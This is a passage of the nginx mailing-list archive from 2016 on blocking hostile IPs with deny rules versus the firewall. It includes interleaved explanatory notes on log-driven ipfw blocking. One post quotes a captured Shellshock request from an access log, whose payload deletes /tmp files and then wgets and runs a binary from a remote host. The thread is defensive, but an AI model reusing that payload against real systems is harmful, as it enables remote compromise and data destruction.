HTTP/1.1" 444 0 "-" "-"
--

I'm putting the return code first to simplify the script I will use to
feed blocked IPs into ipfw.
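With the status first, the log-to-ipfw step reduces to a short pipeline. This is only a sketch of the idea under my own assumptions (sample log lines inlined for illustration; the ipfw table number is made up):

```shell
# Extract client IPs from lines whose first field (the $status placed
# first in the custom log format) is 444, de-duplicate them, and print
# one "ipfw table add" command per address. Pipe the output into sh
# (as root) to actually apply it.
printf '%s\n' \
  '444 111.91.62.144 - - [21/Aug/2016:09:31:50 +0000] "GET /wp-login.php HTTP/1.1" 0 "-"' \
  '200 93.184.216.34 - - [21/Aug/2016:09:44:02 +0000] "GET / HTTP/1.1" 643 "-"' \
  '444 111.91.62.144 - - [21/Aug/2016:10:02:11 +0000] "GET /admin/config.php HTTP/1.1" 0 "-"' |
awk '$1 == 444 { print $2 }' | sort -u |
while read -r ip; do
  printf 'ipfw table 1 add %s\n' "$ip"
done
# prints: ipfw table 1 add 111.91.62.144
```

In production the printf block would be replaced by reading /var/log/nginx/access.log.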

My nginx.conf follows (abbreviated). The email may mangle the
formatting a bit.
-
http {

log_format  main  '$status $remote_addr - $remote_user [$time_local] 
"$request" '
  '$body_bytes_sent "$http_referer" '
  '"$http_user_agent" "$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main;
---
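One plausible explanation (an assumption on my part, since the full config isn't shown): nginx falls back to the predefined "combined" format whenever an access_log directive names no format, so a second access_log directive anywhere in the included config would produce exactly this mix. Sketch:

```nginx
http {
    log_format main '$status $remote_addr - $remote_user [$time_local] "$request" '
                    '$body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';
    access_log /var/log/nginx/access.log main;   # custom format, status first

    server {
        # a directive like the following (format name omitted) logs to
        # the same file in "combined" format, status in its usual place:
        # access_log /var/log/nginx/access.log;
    }
}
```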



Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 23:49:30 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:

> On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300
> > "Valentin V. Bartenev" <vb...@nginx.com> wrote:
> > 
> > > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > > > I see a fair amount of hacking attempts in the access.log. That
> > > > is, they 
> > > show up with a return code of 400 (malformed). Well yeah, they are
> > > certainly malformed. But when I add the offending IP address to my
> > > blocked list, they still show up as malformed upon subsequent
> > > readings of access.log. That is, it appears to me that nginx isn't
> > > checking the blocked list first.
> > > > 
> > > > If true, shouldn't the blocked IPs take precedence?
> > > > 
> > > > Nginx 1.10.1 on freebsd 10.2
> > > > 
> > > 
> > > It's unclear what do you mean by "my blocked list".  But if you're
> > > speaking about "ngx_http_access_module" then the answer is no, it
> > > shouldn't take precedence.  It works on a location basis, which
> > > implies that the request has been parsed already.
> > > 
> > >   wbr, Valentin V. Bartenev
> > > 
> > > ___
> > 
> > My "blocked IPs" are implemented as follows. In nginx.conf:
> > --
> > http {
> > include   mime.types;
> > include  /usr/local/etc/nginx/blockips.conf;
> > -
> > 
> > The format of the blockips.conf file:
> > --
> > #haliburton
> > deny 34.183.197.69 ;
> > #cloudflare
> > deny 103.21.244.0/22 ;
> > deny 103.22.200.0/22 ;
> > deny 103.31.4.0/22 ;
> > ---
> 
> The "deny" directive comes from ngx_http_access_module.
> 
> See the documentation:
> http://nginx.org/en/docs/http/ngx_http_access_module.html
>  
> 
> > 
> > Running "make config" in the nginx ports, I don't see
> > "ngx_http_access_module" as an option, nor anything similar.
> > 
> [..]
> 
> It's a standard module, which is usually built by default.
> 
> 
> > So given this setup, should the IP space in blockips.conf take
> > precedence? 
> 
> No.
> 
> 
> > 
> > My thinking is this. If a certain IP (or more generally the entire
> > IP space of the entity) is known to be attempting hacks, why bother
> > to process the http request? I know I could block them in the
> > firewall, but blocking in the web server makes more sense to me.
> 
> Why bother to accept such connection at all?  There's no sense
> to accept connection in nginx and then discard it immediately.
> 
> In your case it should be blocked on the system level.
> 
>   wbr, Valentin V. Bartenev
> 
> ___

I can do the blocking in the firewall, but I can see a scenario where a
web hosting provider would want to do the blocking in the web server on
a per-domain basis. That is, what one customer wants blocked will not
be what all customers want blocked. So if the IP could be checked first
within nginx, there would be value in that.
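The per-domain case is in fact what per-server deny rules provide: ngx_http_access_module rules scoped to one server{} (or location{}) block apply only there, so each virtual host can carry its own block list. A sketch with made-up hostnames:

```nginx
server {
    server_name customer-a.example;
    # this customer's block list; matching requests get a 403
    include /usr/local/etc/nginx/blockips.conf;
}
server {
    server_name customer-b.example;
    # no include here, so the same IPs are served normally
}
```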

In my case, I only want to block web access, which I assume I can do
via the firewall. My point is that the web server has a significantly
larger attack surface than email. So while I would want to block access
to my nginx server, I would still allow email from the same "blocked"
IP. After all, the user I blocked might want to email the webmaster to
ask why they are blocked. Or there may be multiple domains at the same
IP, and not everyone there is a hacker. Eyeballs generally come from
ISPs and schools; datacenters are not eyeballs. Yeah, people surf from
work, but if you block some corporate server that has been attempting
to hack your server, so be it. Email, on the other hand, DOES come from
datacenters, so datacenters shouldn't be blocked from port 25.
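Port-selective blocking like that is what a packet filter does well. A hypothetical ipfw fragment for FreeBSD (the rule number, table number, and network are made up; check the syntax against ipfw(8) before use):

```
# populate a lookup table with the offending network
ipfw table 1 add 185.130.0.0/16
# drop only web traffic from addresses in table 1; anything else from
# those addresses (e.g. SMTP on port 25) is still allowed through
ipfw add 100 deny tcp from 'table(1)' to me 80,443
```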





Bash script; Was it executed?

2016-07-30 Thread li...@lazygranch.com
I see a return code of 200. Does that mean this script was executed?
-
219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod
>> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma
>> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod
>> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm
>> >> -rf /tmp/*;echo wget http://houmen
.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod
>> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma
>> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7
77 /tmp/Run.sh;/tmp/Run.sh\x22"
-
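That request is a Shellshock (CVE-2014-6271) probe stuffed into the headers. nginx serving a static "/" never hands header values to bash, so the 200 only means the index page was sent; the payload would run only if something like a CGI handler exported those headers into a bash environment. A quick local check (my suggestion, not from the thread) of whether a bash binary is vulnerable:

```shell
# a vulnerable bash executes the trailer after the function definition
# and prints "vulnerable" before "test"; a patched bash prints only "test"
env x='() { :;}; echo vulnerable' bash -c 'echo test'
```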



Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 13:18:47 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:

> On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > I see a fair amount of hacking attempts in the access.log. That is,
> > they 
> show up with a return code of 400 (malformed). Well yeah, they are
> certainly malformed. But when I add the offending IP address to my
> blocked list, they still show up as malformed upon subsequent
> readings of access.log. That is, it appears to me that nginx isn't
> checking the blocked list first.
> > 
> > If true, shouldn't the blocked IPs take precedence?
> > 
> > Nginx 1.10.1 on freebsd 10.2
> > 
> 
> It's unclear what do you mean by "my blocked list".  But if you're
> speaking about "ngx_http_access_module" then the answer is no, it
> shouldn't take precedence.  It works on a location basis, which
> implies that the request has been parsed already.
> 
>   wbr, Valentin V. Bartenev
> 
> ___

My "blocked IPs" are implemented as follows. In nginx.conf:
--
http {
include   mime.types;
include  /usr/local/etc/nginx/blockips.conf;
-

The format of the blockips.conf file:
--
#haliburton
deny 34.183.197.69 ;
#cloudflare
deny 103.21.244.0/22 ;
deny 103.22.200.0/22 ;
deny 103.31.4.0/22 ;
---

Running "make config" in the nginx ports, I don't see
"ngx_http_access_module" as an option, nor anything similar.

So given this setup, should the IP space in blockips.conf take
precedence? 

My thinking is this. If a certain IP (or more generally the entire IP
space of the entity) is known to be attempting hacks, why bother to
process the http request? I know I could block them in the firewall,
but blocking in the web server makes more sense to me.

Here is an example from access.log for a return code of 400:
95.213.177.126 - - [30/Jul/2016:11:35:46 +] "CONNECT 
check.proxyradar.com:80 HTTP/1.1" 400 173 "-" "-"

I have the entire IP space of selectel.ru blocked since it is a source
of constant hacking. (Uh, no offense to the land of dot ru).






